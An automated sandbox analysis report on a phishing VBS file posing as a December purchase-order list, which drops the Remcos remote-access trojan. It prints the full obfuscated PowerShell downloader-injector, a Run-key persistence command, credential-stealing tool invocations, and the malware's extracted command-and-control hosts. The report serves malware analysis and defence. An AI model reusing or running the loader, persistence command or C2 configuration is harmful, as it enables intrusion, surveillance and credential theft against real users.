Overview

overview

10

Static

static

1

Rfq_po_dec...00.vbs

windows7-x64

10

Rfq_po_dec...00.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 20:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbs

  • Size

    34KB

  • MD5

    429fa2fac12973a50fbd8e41998e6c8b

  • SHA1

    774c2fe5f115156eefd125497da2e14f4e4ae001

  • SHA256

    457b79bd32d44957c1e9608f1ff2d2b5a38244beb2c1234356b568c5a3cd5f9a

  • SHA512

    65324b5653bf5e255b029e296cfc78f4fa07757adfa0b09d50ff12d7b70cd68980bfb88ebc916cf480c656132193ac84061ee393b0ae11f1e25a1635ab21367e

  • SSDEEP

    384:y4TN2uK4JSWDatgGQjwFzpOHCAxQzkmXXM3veQ:zTN2uK4JxDatgbjwFp6zxW+mQ

Score
10/10
remcosvaldocollectiondiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Valdo

C2

janout21oadsts1.duckdns.org:57484

janout21oadsts1.duckdns.org:57483

janout21oadsts2.duckdns.org:57484

janout21oadsts3.duckdns.org:57484

janout21oadsts4.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    amaonspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    lmoijuetgtso-Y2NXRF

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$togue='Ornithodelphian';;$Shoat='Atomekspert';;$Photoduplication='Anthropolatric';;$Sovser='Syllabation';;$Hued=$host.Name;function Seismologis84($Erstatningsforslagenes){If ($Hued) {$kedsommeligst=5} for ($Plusher=$kedsommeligst;;$Plusher+=6){if(!$Erstatningsforslagenes[$Plusher]){$Flingens++;break }$Asbesten+=$Erstatningsforslagenes[$Plusher];$Fineret='Aare'}$Asbesten}function Outprayed($Rottedes){ .($Marlacious) ($Rottedes)}$Formularernes=Seismologis84 'C rymNTaiasEEdaphT Sunt.foru W';$Formularernes+=Seismologis84 'GracieSedatBEriopc andL BarnIPl muESar anAfstbT';$Computernrden=Seismologis84 'OvermMPri eoForb zLumini redblSpir.l bstia Spal/';$Bryggekedelen=Seismologis84 'Neg tTTranslStransSitua1Brick2';$Epidia='Recar[ MillNGazooeTabelT.orfo. TottsFabriE.roderCryosvL.endIUrbanC dangERe roP ,nteOCon.eiIndprN Fo htKomm,mRessoA Persn Bansa tedbgPrioreAggreRsyria]Udlos:Ufors: TeatS fteEImpulCHusfauTagryRMod riI swiT Termy KollPtipvorPackeOMartiTFeterOWayl,CSpinaoskrteLPersp=bes a$PresuBUdtydRKvaliyStyltgSu trGSwamiEMorsokFilsyeMantedFla oECo polEmbedEdefilN';$Computernrden+=Seismologis84 ' Flyv5 Kont.Abule0Aarsu Unfr,(UncomWNabogiStatunAppeldSklskoDetacwUndersAadse FabrNAlpheTNacke Circ,1Datas0Air,a.Hjrne0A.unc;Preis ArbejW ,orsiOffernPrefe6Tresk4Gensk; Sh r Ef ekxHusfl6Af,en4D urb;Mysel Li,otrForthvBabir:Stran1Sange3Virg 1 F,nk.I dtg0Domsp)Trans DestaG Unc.eO varcForlakSmello Con /Hypoz2Sligh0Fugle1 Ex.l0Oscul0Symp 1Krig 0 Cano1Assum Ove,FLneuniBegitr PiraeLaps,fCoquioSkippx,ceto/Op,as1anima3 Brev1Bista. Inte0';$Argest135=Seismologis84 'RudelUInvitsBumpseFu.dtrGara -AkelaA Ins.gMar uELog,knNyt et';$Pagajernes=Seismologis84 'RentehDeit,tCom,it kovbpV.ldtsMarty:T pem/Bisag/ NdvesLea.eu redipHoldaa Ud bmAdriaaKv,ltn FlletTelegeAssyrx Ak i.D aphcko suoDimetm Pros/ .ranFSkrbulPri,kaPreouthesteb MaterBaadeoForredJourn.AngoraHymena RaymfNikol>fyldeh HosptAfs,atGastrp Das ssi na:Coc,s/Fauxl/LieposUdtoluSkulephjerta AnsamSchtiaSk mrnArbejtRetrae F rdxD.modb imincfri.uk Misau rutep iasp.Na nkc VapooB.tikm Epit/SkovkFLuminlKarr aUn,qutPoll.bVic ar.hairoForbrdOverl.ModlyaMotopaSensaf';$Driftssikkerer=Seismologis84 'Faen >';$Marlacious=Seismologis84 'UncaliSkakbeNulstx';$Uretmssigheden='Poppylike';$Afsvkningernes='\Spermoderm88.For';Outprayed (Seismologis84 'Symme$,prgeg FradlnerveOriggabTelchATr.nsL Tuss: BdepuLadt,NRotorP AbeloRo usUDes,enUnadmCKymriE FodedUnhyd=Herni$RectoE ,abyNBloklV C ro:omgruaDisidp IndkpOverbd StipAHo,pit TeksADefin+Rekti$Hert,aFikieFFiskesTvredv ,mklkHarannHjemmiSpacenThirsG NonpEBibliR agerNUnstreDomsts');Outprayed (Seismologis84 'Kreti$Integg alpelUoverO undeBEuryhaGymn lLytts:SlangBForesAD.pill elseeRaaklNAugurCVrdikIIr ecaCa,fdGBibliaauten=Krydd$IncapPFl.tbaS.miaGBehf A DrotJU exiELorinrH lafNAflivePolioSPo.te.Und,rSIndfrpTrilllan ndiMarquTAntir(Meta.$H,mopdCountr Pe,mIJapanfPreobtGymnaSthornsBacksiPeckskTvtteKRev.leFormurTheo EMea.wRDu ke)');Outprayed (Seismologis84 $Epidia);$Pagajernes=$Balenciaga[0];$Dybsindets=(Seismologis84 ' .imi$OllebgSyvtaLOwns,OFenagBVodena JaggL .efu:F ankoOctylbSkovrt EulaeFlypasLeksitDgnsmaB gsttProteITraadoBenn NTeleu=FortunJagt eT,oskw erli-sprogOImpurB DisjJ CimmEResp,CIndistHarke Kale SDesaryBloods Hyp tLrdagEIrlinMBroke. orde$ Bag.fSmerto CistrHyperMAttraUMetalLEleemACanalrGluteeGttenrDerienArtieeGradnS');Outprayed ($Dybsindets);Outprayed (Seismologis84 ' Quoi$Fim eO Rum bSolidt JerreFutursHove tforsba ,hlotApproiResunoSejlbnPr ar. He tHWestbeSeve.a SalvdGlos e ForerBedrasPlasm[Boble$F lkoArevisrIrgengOm kre ReslsAfsvotLip e1 Soko3Bag t5pr em] cham= Kl,t$ApostC plaso Oscim camppAmygdu PodatAdelseHockerInte nCytoprNonsidWenz e Ri.sn');$Samovarerne=Seismologis84 ' Ci,a$RefraO,rhvebU,rigtPhytoeBitsysUn,obtBo reaFa actKalori Lan oAcantn Magn. SaurDPersooRavnewTorn.nGlif lHoedeoB folaOvermdGraadFKnitbiSkomal Sk ee Galo( Turb$ f igPLimetaDommegUgennaHyperjEst,reTwilirudaannS.xoneSupers Unin,Trach$ Ha raVagtmrHexadrHistoa Rotun mtssgAffole Ovarr OptiiHumorn S,aagScrageUmbelrForcenCribbePoser)';$arrangeringerne=$Unpounced;Outprayed (Seismologis84 ' Edge$Klubhg UneqlVandboChlambSpasmani htlLrebo: Korel BestoPalaeGgormpi .dmtCeftera .rykl Is,cIAbessSSnkereTurkesAppel=Desti(Agitat LoosESatyaSBrissT S,ab- Sk,lP J.wsAAnti,TPercoHNonte Ga ga$BrnefARev erEnso rHenfaAGl ptnkabarg ResmeEksprREjendiPrivanBronzGM.gameUnshrr DeskNTeaktE S lv)');while (!$Logicalises) {Outprayed (Seismologis84 'Evolu$munkegUnflulH drroGenneb Vaa a Ch ilBadst:SinusRbraxiaTerr.v.upenaParabgfunkteI denrAquacs Unde=Ekspo$CanesK.dereaDeci t kuplaAdverlIn.spo UnligAutoisMani tNitrorToilluGristk SynctbrugeuGurglrPr jee SoverUdsti1Scrub5 Onto3') ;Outprayed $Samovarerne;Outprayed (Seismologis84 ' Dou.sIn ifTSke pA TabgrPrsenTJuven-blodlsStmagLslideEErstae.orepPDahli Polar4');Outprayed (Seismologis84 'Radia$undenGMinerlUlovlOHygeib arbeaAnemolN,dlg: MeaglAfpreohernaGPhotoIPassac rriaRegral RemoINeutrSHereaEsalgeSBrand=Multi( umanT To ceVrdigsBord tMi,ro-ChichpbunnsAT yghTCoum,HBorer .orls$SkindAFak uR ominrUddelaPolitnEnsurGBulliEHalosrGstfrITetr n SommGT orie AmerRFa erNNitroE lat)') ;Outprayed (Seismologis84 'Autod$EntomgThorilR nchotele BB ystAHeterLInqui:Galanj V enEHelbrrMerveA,iddemArmipeKautiyReesh=Feath$ esuiGUnderLDisabo Ind BOnderaPlag LDread:Smu sTL stovRekorARangdnEffekGMi,ers JebliSkov.n P lvdDinapL N chGOrnitGStatuEDisansRam.e+Sporv+Blade%gro l$K eosBHn.ikaH vanL ardieFlersnReligcJ.viaIEp seaForsygSwingAImita.KlootCSlabboPatenUParotn udsat') ;$Pagajernes=$Balenciaga[$jeramey]}$Embeam=300252;$hydrophid=31283;Outprayed (Seismologis84 'Acces$Redung Sn.rl ChamoEnrolbKnippaPseudlAntis: varicSupe.N Henli SelvdUvulaaka se Peaco=Sapid ampeGUnderEOsiritEncas-ExtorcSekunO.barnN ValmT DmonE ColtnSee iTUdrm Mojo$K,ttlaLippyr xterRmagn,A NorgN paasgEjende Saftr FortI nsphNpandagUnbrieMar or NettNDevote');Outprayed (Seismologis84 ' Tyto$I.fragKandilValgfoL,owibRubyia Fo elSkalp:SlyngP ningoSyntheSk ndc KonchdisenoSkaftrHell eReunisslu.s Elep = Teks Pla.h[RejfeSFastfyT iolsO.nortSektie.alvemMaril.cerveCMe.apoKamelnAure vPaabeeTitmarundert Un e]U ion:Un.hi:SquamFstillrUpaakoridefm BejdBAdopta S,orsLin.eeSkrmf6A.akr4Co ntSFrednt Tox rAsiatiJag bnPelagg Figw(St rt$NominCNonvanPommeiacclidM delaReneg)');Outprayed (Seismologis84 ' S.am$ Za bG SmgeLAf igo DistbMor.iaBlaewLCor,n:Kryptf brusLOmodyuGi,lin TraaKBues Y ,erviBan bST.erstF licIPle uCsrdel C ove=Trite Fril,[Sk.vlsIcho YStaldSCacomTSpra ECleanM.ighl.D,smotNan pEOvolyX rediTSensi.AnstreForbiNLydteC HersoAn,imDMarkei PaadnFilisG hor.]Apost:Vi.dr:HiemaA ngesBandec,outhISkudrIlangs.,papigBa amENonheTFormasArkettSmudsrUntriis.eneN ,ongG hamp(Prere$ RytmP NonfoJ nkrEforsyCOverdHMaizeoBlodtrTorsiEPrepuSHeeze)');Outprayed (Seismologis84 'twis $MiltigOpforL Po.aOEumenbRustiASa,tblBrn l:agnesNTelesuT aceTBrugegCyc,sAVivisL BoulL rchi1Vandl8Synar0Bytte=Money$Syzygfs rhul VerguUnexanWood kAnt,sYElecti S alSTablet A grIHalvfCRetfr. gladsP oduU Bh.rBGlossSDoubtTHalv,Rkrau IForviNTabasGStumf(Splan$UnnereudestMKropsB FornE Fad.aFi,taM erve,Gnot $ UnraHFuselYWea.id Quonrfa keoStelap ajseH virliEpos dLakse)');Outprayed $Nutgall180;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2156
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$togue='Ornithodelphian';;$Shoat='Atomekspert';;$Photoduplication='Anthropolatric';;$Sovser='Syllabation';;$Hued=$host.Name;function Seismologis84($Erstatningsforslagenes){If ($Hued) {$kedsommeligst=5} for ($Plusher=$kedsommeligst;;$Plusher+=6){if(!$Erstatningsforslagenes[$Plusher]){$Flingens++;break }$Asbesten+=$Erstatningsforslagenes[$Plusher];$Fineret='Aare'}$Asbesten}function Outprayed($Rottedes){ .($Marlacious) ($Rottedes)}$Formularernes=Seismologis84 'C rymNTaiasEEdaphT Sunt.foru W';$Formularernes+=Seismologis84 'GracieSedatBEriopc andL BarnIPl muESar anAfstbT';$Computernrden=Seismologis84 'OvermMPri eoForb zLumini redblSpir.l bstia Spal/';$Bryggekedelen=Seismologis84 'Neg tTTranslStransSitua1Brick2';$Epidia='Recar[ MillNGazooeTabelT.orfo. TottsFabriE.roderCryosvL.endIUrbanC dangERe roP ,nteOCon.eiIndprN Fo htKomm,mRessoA Persn Bansa tedbgPrioreAggreRsyria]Udlos:Ufors: TeatS fteEImpulCHusfauTagryRMod riI swiT Termy KollPtipvorPackeOMartiTFeterOWayl,CSpinaoskrteLPersp=bes a$PresuBUdtydRKvaliyStyltgSu trGSwamiEMorsokFilsyeMantedFla oECo polEmbedEdefilN';$Computernrden+=Seismologis84 ' Flyv5 Kont.Abule0Aarsu Unfr,(UncomWNabogiStatunAppeldSklskoDetacwUndersAadse FabrNAlpheTNacke Circ,1Datas0Air,a.Hjrne0A.unc;Preis ArbejW ,orsiOffernPrefe6Tresk4Gensk; Sh r Ef ekxHusfl6Af,en4D urb;Mysel Li,otrForthvBabir:Stran1Sange3Virg 1 F,nk.I dtg0Domsp)Trans DestaG Unc.eO varcForlakSmello Con /Hypoz2Sligh0Fugle1 Ex.l0Oscul0Symp 1Krig 0 Cano1Assum Ove,FLneuniBegitr PiraeLaps,fCoquioSkippx,ceto/Op,as1anima3 Brev1Bista. Inte0';$Argest135=Seismologis84 'RudelUInvitsBumpseFu.dtrGara -AkelaA Ins.gMar uELog,knNyt et';$Pagajernes=Seismologis84 'RentehDeit,tCom,it kovbpV.ldtsMarty:T pem/Bisag/ NdvesLea.eu redipHoldaa Ud bmAdriaaKv,ltn FlletTelegeAssyrx Ak i.D aphcko suoDimetm Pros/ .ranFSkrbulPri,kaPreouthesteb MaterBaadeoForredJourn.AngoraHymena RaymfNikol>fyldeh HosptAfs,atGastrp Das ssi na:Coc,s/Fauxl/LieposUdtoluSkulephjerta AnsamSchtiaSk mrnArbejtRetrae F rdxD.modb imincfri.uk Misau rutep iasp.Na nkc VapooB.tikm Epit/SkovkFLuminlKarr aUn,qutPoll.bVic ar.hairoForbrdOverl.ModlyaMotopaSensaf';$Driftssikkerer=Seismologis84 'Faen >';$Marlacious=Seismologis84 'UncaliSkakbeNulstx';$Uretmssigheden='Poppylike';$Afsvkningernes='\Spermoderm88.For';Outprayed (Seismologis84 'Symme$,prgeg FradlnerveOriggabTelchATr.nsL Tuss: BdepuLadt,NRotorP AbeloRo usUDes,enUnadmCKymriE FodedUnhyd=Herni$RectoE ,abyNBloklV C ro:omgruaDisidp IndkpOverbd StipAHo,pit TeksADefin+Rekti$Hert,aFikieFFiskesTvredv ,mklkHarannHjemmiSpacenThirsG NonpEBibliR agerNUnstreDomsts');Outprayed (Seismologis84 'Kreti$Integg alpelUoverO undeBEuryhaGymn lLytts:SlangBForesAD.pill elseeRaaklNAugurCVrdikIIr ecaCa,fdGBibliaauten=Krydd$IncapPFl.tbaS.miaGBehf A DrotJU exiELorinrH lafNAflivePolioSPo.te.Und,rSIndfrpTrilllan ndiMarquTAntir(Meta.$H,mopdCountr Pe,mIJapanfPreobtGymnaSthornsBacksiPeckskTvtteKRev.leFormurTheo EMea.wRDu ke)');Outprayed (Seismologis84 $Epidia);$Pagajernes=$Balenciaga[0];$Dybsindets=(Seismologis84 ' .imi$OllebgSyvtaLOwns,OFenagBVodena JaggL .efu:F ankoOctylbSkovrt EulaeFlypasLeksitDgnsmaB gsttProteITraadoBenn NTeleu=FortunJagt eT,oskw erli-sprogOImpurB DisjJ CimmEResp,CIndistHarke Kale SDesaryBloods Hyp tLrdagEIrlinMBroke. orde$ Bag.fSmerto CistrHyperMAttraUMetalLEleemACanalrGluteeGttenrDerienArtieeGradnS');Outprayed ($Dybsindets);Outprayed (Seismologis84 ' Quoi$Fim eO Rum bSolidt JerreFutursHove tforsba ,hlotApproiResunoSejlbnPr ar. He tHWestbeSeve.a SalvdGlos e ForerBedrasPlasm[Boble$F lkoArevisrIrgengOm kre ReslsAfsvotLip e1 Soko3Bag t5pr em] cham= Kl,t$ApostC plaso Oscim camppAmygdu PodatAdelseHockerInte nCytoprNonsidWenz e Ri.sn');$Samovarerne=Seismologis84 ' Ci,a$RefraO,rhvebU,rigtPhytoeBitsysUn,obtBo reaFa actKalori Lan oAcantn Magn. SaurDPersooRavnewTorn.nGlif lHoedeoB folaOvermdGraadFKnitbiSkomal Sk ee Galo( Turb$ f igPLimetaDommegUgennaHyperjEst,reTwilirudaannS.xoneSupers Unin,Trach$ Ha raVagtmrHexadrHistoa Rotun mtssgAffole Ovarr OptiiHumorn S,aagScrageUmbelrForcenCribbePoser)';$arrangeringerne=$Unpounced;Outprayed (Seismologis84 ' Edge$Klubhg UneqlVandboChlambSpasmani htlLrebo: Korel BestoPalaeGgormpi .dmtCeftera .rykl Is,cIAbessSSnkereTurkesAppel=Desti(Agitat LoosESatyaSBrissT S,ab- Sk,lP J.wsAAnti,TPercoHNonte Ga ga$BrnefARev erEnso rHenfaAGl ptnkabarg ResmeEksprREjendiPrivanBronzGM.gameUnshrr DeskNTeaktE S lv)');while (!$Logicalises) {Outprayed (Seismologis84 'Evolu$munkegUnflulH drroGenneb Vaa a Ch ilBadst:SinusRbraxiaTerr.v.upenaParabgfunkteI denrAquacs Unde=Ekspo$CanesK.dereaDeci t kuplaAdverlIn.spo UnligAutoisMani tNitrorToilluGristk SynctbrugeuGurglrPr jee SoverUdsti1Scrub5 Onto3') ;Outprayed $Samovarerne;Outprayed (Seismologis84 ' Dou.sIn ifTSke pA TabgrPrsenTJuven-blodlsStmagLslideEErstae.orepPDahli Polar4');Outprayed (Seismologis84 'Radia$undenGMinerlUlovlOHygeib arbeaAnemolN,dlg: MeaglAfpreohernaGPhotoIPassac rriaRegral RemoINeutrSHereaEsalgeSBrand=Multi( umanT To ceVrdigsBord tMi,ro-ChichpbunnsAT yghTCoum,HBorer .orls$SkindAFak uR ominrUddelaPolitnEnsurGBulliEHalosrGstfrITetr n SommGT orie AmerRFa erNNitroE lat)') ;Outprayed (Seismologis84 'Autod$EntomgThorilR nchotele BB ystAHeterLInqui:Galanj V enEHelbrrMerveA,iddemArmipeKautiyReesh=Feath$ esuiGUnderLDisabo Ind BOnderaPlag LDread:Smu sTL stovRekorARangdnEffekGMi,ers JebliSkov.n P lvdDinapL N chGOrnitGStatuEDisansRam.e+Sporv+Blade%gro l$K eosBHn.ikaH vanL ardieFlersnReligcJ.viaIEp seaForsygSwingAImita.KlootCSlabboPatenUParotn udsat') ;$Pagajernes=$Balenciaga[$jeramey]}$Embeam=300252;$hydrophid=31283;Outprayed (Seismologis84 'Acces$Redung Sn.rl ChamoEnrolbKnippaPseudlAntis: varicSupe.N Henli SelvdUvulaaka se Peaco=Sapid ampeGUnderEOsiritEncas-ExtorcSekunO.barnN ValmT DmonE ColtnSee iTUdrm Mojo$K,ttlaLippyr xterRmagn,A NorgN paasgEjende Saftr FortI nsphNpandagUnbrieMar or NettNDevote');Outprayed (Seismologis84 ' Tyto$I.fragKandilValgfoL,owibRubyia Fo elSkalp:SlyngP ningoSyntheSk ndc KonchdisenoSkaftrHell eReunisslu.s Elep = Teks Pla.h[RejfeSFastfyT iolsO.nortSektie.alvemMaril.cerveCMe.apoKamelnAure vPaabeeTitmarundert Un e]U ion:Un.hi:SquamFstillrUpaakoridefm BejdBAdopta S,orsLin.eeSkrmf6A.akr4Co ntSFrednt Tox rAsiatiJag bnPelagg Figw(St rt$NominCNonvanPommeiacclidM delaReneg)');Outprayed (Seismologis84 ' S.am$ Za bG SmgeLAf igo DistbMor.iaBlaewLCor,n:Kryptf brusLOmodyuGi,lin TraaKBues Y ,erviBan bST.erstF licIPle uCsrdel C ove=Trite Fril,[Sk.vlsIcho YStaldSCacomTSpra ECleanM.ighl.D,smotNan pEOvolyX rediTSensi.AnstreForbiNLydteC HersoAn,imDMarkei PaadnFilisG hor.]Apost:Vi.dr:HiemaA ngesBandec,outhISkudrIlangs.,papigBa amENonheTFormasArkettSmudsrUntriis.eneN ,ongG hamp(Prere$ RytmP NonfoJ nkrEforsyCOverdHMaizeoBlodtrTorsiEPrepuSHeeze)');Outprayed (Seismologis84 'twis $MiltigOpforL Po.aOEumenbRustiASa,tblBrn l:agnesNTelesuT aceTBrugegCyc,sAVivisL BoulL rchi1Vandl8Synar0Bytte=Money$Syzygfs rhul VerguUnexanWood kAnt,sYElecti S alSTablet A grIHalvfCRetfr. gladsP oduU Bh.rBGlossSDoubtTHalv,Rkrau IForviNTabasGStumf(Splan$UnnereudestMKropsB FornE Fad.aFi,taM erve,Gnot $ UnraHFuselYWea.id Quonrfa keoStelap ajseH virliEpos dLakse)');Outprayed $Nutgall180;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1784
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tvrest" /t REG_EXPAND_SZ /d "%Imitableness% -windowstyle 1 $Medicomoral=(gp -Path 'HKCU:\Software\Confuting\').forretningsbger;%Imitableness% ($Medicomoral)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tvrest" /t REG_EXPAND_SZ /d "%Imitableness% -windowstyle 1 $Medicomoral=(gp -Path 'HKCU:\Software\Confuting\').forretningsbger;%Imitableness% ($Medicomoral)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:404
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\sllvaporrsycbavpiticqzujhpwci"
        3⤵
          PID:5024
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\sllvaporrsycbavpiticqzujhpwci"
          3⤵
            PID:4344
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\sllvaporrsycbavpiticqzujhpwci"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4352
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\dfygbzysfaqhlgrtzdvdbmpahdoljljh"
            3⤵
            • Accesses Microsoft Outlook accounts
            • System Location Discovery: System Language Discovery
            PID:2248
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fhezb"
            3⤵
              PID:4540
            • C:\Windows\SysWOW64\msiexec.exe
              C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fhezb"
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1896

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          d1414b301c11e310c55c6fd19b5beeb6

          SHA1

          a9a8feef8d7bd65cb5a423665f5ca084672c1af8

          SHA256

          94cb5e8396bc3c3e64e9a9c9cf794a9715148783bb0a91d8c8b77849838df6d0

          SHA512

          1aecaa226433d392968e7ceec6fcabb625a138af4101c36f67cfe1174c4c1c0112999e4638e91664a6eb6a9b0b62a108e77902baec37ae4b59729ebe04fadda4

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_502dyynw.ufw.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\sllvaporrsycbavpiticqzujhpwci
          Filesize

          4KB

          MD5

          562a58578d6d04c7fb6bda581c57c03c

          SHA1

          12ab2b88624d01da0c5f5d1441aa21cbc276c5f5

          SHA256

          ff5c70287ba432a83f9015209d6e933462edca01d68c53c09882e1e4d22241c8

          SHA512

          3f6e19faa0196bd4c085defa587e664abdd63c25ef30df8f4323e60a5a5aca3cd2709466f772e64ab00fe331d4264841422d6057451947f3500e9252a132254e

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Spermoderm88.For
          Filesize

          431KB

          MD5

          dd6ecd57fb3dec0fd37ee935ef4dde5b

          SHA1

          fa0eb58e9226605555aea72b28f22d66a30b6109

          SHA256

          4c6c1b94d2c27c43fa14202471ab3c04ea0e10bf1c6f16e8843f5b2e4f3768e1

          SHA512

          4852bf46af33f3ee3afb8d715c05ad3371b48da6ed35820ee2f011425678784a60664bd9b5f69066cfd47d09ff9911e5b6d62d425245b95a63c20c77ee77e40e

          Download Submit

        • memory/1700-43-0x0000000007470000-0x0000000007506000-memory.dmp

          Filesize

          600KB

          Download

        • memory/1700-40-0x00000000061F0000-0x000000000623C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1700-47-0x0000000008C10000-0x000000000B1C5000-memory.dmp

          Filesize

          37.7MB

          Download

        • memory/1700-23-0x00000000028A0000-0x00000000028D6000-memory.dmp

          Filesize

          216KB

          Download

        • memory/1700-24-0x00000000053A0000-0x00000000059C8000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/1700-25-0x00000000052E0000-0x0000000005302000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1700-26-0x00000000059D0000-0x0000000005A36000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1700-27-0x0000000005A40000-0x0000000005AA6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1700-37-0x0000000005C70000-0x0000000005FC4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1700-45-0x0000000008660000-0x0000000008C04000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/1700-39-0x00000000061B0000-0x00000000061CE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1700-44-0x00000000073D0000-0x00000000073F2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1700-41-0x0000000007A30000-0x00000000080AA000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/1700-42-0x0000000006760000-0x000000000677A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1784-78-0x0000000021080000-0x0000000021099000-memory.dmp

          Filesize

          100KB

          Download

        • memory/1784-82-0x0000000021080000-0x0000000021099000-memory.dmp

          Filesize

          100KB

          Download

        • memory/1784-81-0x0000000021080000-0x0000000021099000-memory.dmp

          Filesize

          100KB

          Download

